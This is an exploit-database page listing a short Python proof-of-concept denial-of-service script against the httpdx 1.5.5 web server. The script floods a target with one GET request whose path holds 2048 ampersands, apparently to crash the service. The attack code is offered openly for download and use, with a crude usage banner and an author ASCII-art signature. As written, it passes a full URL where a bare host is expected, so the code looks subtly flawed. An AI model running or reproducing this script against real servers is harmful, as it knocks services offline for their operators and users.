[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

httpdx 1.5.5 Denial of Service

Author
SnakingMax
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-19114
Category
dos / poc
Date add
04-08-2012
Platform
windows
# Exploit Title: [httpdx 1.5.5 remote D.O.S.]
 # Date: [23/07/2012]
 # Author: [SnakingMax]
 # Website: [http://sourceforge.net/projects/httpdx/]
 # Software Link: [http://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.5/httpdx1.5.5.zip/download]
 # Vendor: jazu100
# Category: [Remote Exploit]


from http.client import HTTPConnection
import sys, urllib.request

if ( (__name__)=="__main__" ):
	if len(sys.argv) != 2:
		print("Wellcome to httpdx madafakar tool\n")
		print("Usage: python3 "+sys.argv[0]+" http://www.VulnerableServer.com\n\n")
		print("Downloaded from: http://snakingmax.blogspot.com/")
	else:
		conn = HTTPConnection(sys.argv[1])
		conn.request('GET', '/'+ ('&'*2048) )


#       ____              _    _             __  __
#      / ___| _ __   __ _| | _(_)_ __   __ _|  \/  | __ ___  __
#      \___ \| '_ \ / _` | |/ / | '_ \ / _` | |\/| |/ _` \ \/ /
#       ___) | | | | (_| |   <| | | | | (_| | |  | | (_| |>  <    ____
#  ____|____/|_| |_|\__,_|_|\_\_|_| |_|\__, |_|  |_|\__,_/_/\_\__/ O  \___/
# <\x41\x41\x41\x41\x41\x41\x41\x41\x41|___/\x41\x41\x41\x41\x41______/   \



#  0day.today [2024-07-02]  #